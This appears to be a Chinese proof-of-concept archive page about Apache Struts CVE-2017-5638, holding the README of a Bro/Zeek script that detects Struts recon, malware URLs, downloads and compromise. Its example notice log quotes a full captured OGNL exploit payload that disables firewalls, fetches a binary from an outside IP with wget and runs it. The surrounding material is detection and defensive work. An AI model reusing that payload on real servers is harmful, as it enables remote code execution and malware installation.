关联漏洞
标题:
Apache Struts 2 输入验证错误漏洞
(CVE-2017-5638)
描述:Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 Apache Struts 2 2.3.32之前的2 2.3.x版本和2.5.10.1之前的2.5.x版本中的Jakarta Multipart解析器存在安全漏洞,该漏洞源于程序没有正确处理文件上传。远程攻击者可借助带有#cmd=字符串的特制Content-Type HTTP头利用该漏洞执行任意命令。
描述
detection for Apache Struts recon and compromise
介绍
I extended Scott Campbell's script further, made it more complicated :)
While "HTTP_StrutsAttack" will stop 100% of the recon, there was still miniscule chance that if a scanner hits a vulnerable system, even though we'd block the scanner, vulnerable system might still do the wget included in the HTTP request and execute the malware. Since we aren't blocking the malware download IP in wget URL which is almost always a different one then recon IP.
So the extended script also extracts the malware download IP
1) Generate the following notices:
redef enum Notice::Type += {
Attempt,
MalwareURL,
HostileDomainLookup,
MalwareURLClick,
FileDownload,
Compromise,
};
- So now this script will extract the "wget" URL from Attempt and then if the URL has a domain (or cnamed domain) script will further track down the IP addresses of malware host and watch for activity.
- if wget URL is seen in http, we'd generate a MalwareURLClick notice
- further notices for FileDownload and Compromise.
- This script is also clusterized.
I ran it over 24 hours and things look stable with respect to script. I am still sure there might be some lame detection holes. so
feel free to modify and let me know too.
Surprisingly, unlike previous times, I don't see huge volume of Struts scanners. I am seeing in range of ~20's a day instead of ~1
000's a day.
Here is example notices:
1489228734.171565 CbVq832QovIwAQddf2 1.24.191.108 65000 131.243.X.Y 80 - - - tcp Struts::Attempt CVE-2017-5638/Struts attack from 1.24.191.108 seen: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.42.249.245:1996/xhx;chmod 777 xhx;./xhx;').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} - 1.24.191.108 131.243.X.Y 80 - worker-5 Notice::ACTION_LOG 3600.000000 F - -- - -
1489237401.399275 C90k4o1Zrn8D7vaXoe 124.117.244.34 49728 128.3.Y.Z 80 - - - tcp Struts::MalwareURL Struts Hostile URLs seen in recon attempt 124.117.244.34 to 128.3.Y.Z with URL [http://121.42.249.245:1996/xhx;chmod 777 xhx;./xhx;] - 124.117.244.34 128.3.Y.Z 80 - worker-13 Notice::ACTION_LOG 3600.000000 F - - - - -
1489240937.969456 CpUhgp1VJnPuOLY8h 128.3.X.Y 33755 121.42.249.245 1996 - - - tcp Struts::MalwareURLClick Struts Hostile URL seen 128.3.X.Y=121.42.249.245 [http://121.42.249.245:1996/tcp/xhx] - 128.3.X.Y 121.42.249.245 1996 - worker-15 Notice::ACTION_LOG 60.000000 F - - - - -
1489240937.969456 CpUhgp1VJnPuOLY8h 128.3.X.Y 33755 121.42.249.245 1996 - - - tcp Struts::Compromise Struts compromise: 128.3.X.Y=121.42.249.245 [http://121.42.249.245:1996/tcp/xhx] - 128.3.X.Y 121.42.249.245 1996 - worker-15 Notice::ACTION_LOG 3600.000000 F - - - - -
1489240940.206456 CpUhgp1VJnPuOLY8h 128.3.X.Y 33755 121.42.249.245 1996 Frx9jZ1JkcrsVtgOkg application/x-executable http://121.42.249.245:1996/tcp/xhx tcp Struts::FileDownload http://121.42.249.245:1996/tcp/xhx http://121.42.249.245:1996/tcp/xhx 128.3.X.Y 121.42.249.245 1996 - worker-15 Notice::ACTION_LOG 3600.000000 F
文件快照
[4.0K] /data/pocs/af6182ec020ddf612c8cf200f6716b9d078eba4a
├── [ 136] bro-pkg.meta
├── [1.5K] COPYING
├── [4.3K] README.md
├── [4.0K] scripts
│ ├── [ 10K] CVE-2017-5638_struts-cluster.bro
│ └── [ 41] __load__.bro
└── [4.0K] tests
├── [4.0K] Baseline
│ └── [4.0K] CVE-2017-5638_struts.CVE-2017-5638_struts
│ └── [5.0K] notice.log
├── [ 535] btest.cfg
├── [4.0K] CVE-2017-5638_struts
│ └── [ 121] CVE-2017-5638_struts.bro
├── [ 15] Makefile
└── [4.0K] Traces
└── [5.4M] HTTP-CVE-2017-5638_struts.pcap
6 directories, 10 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。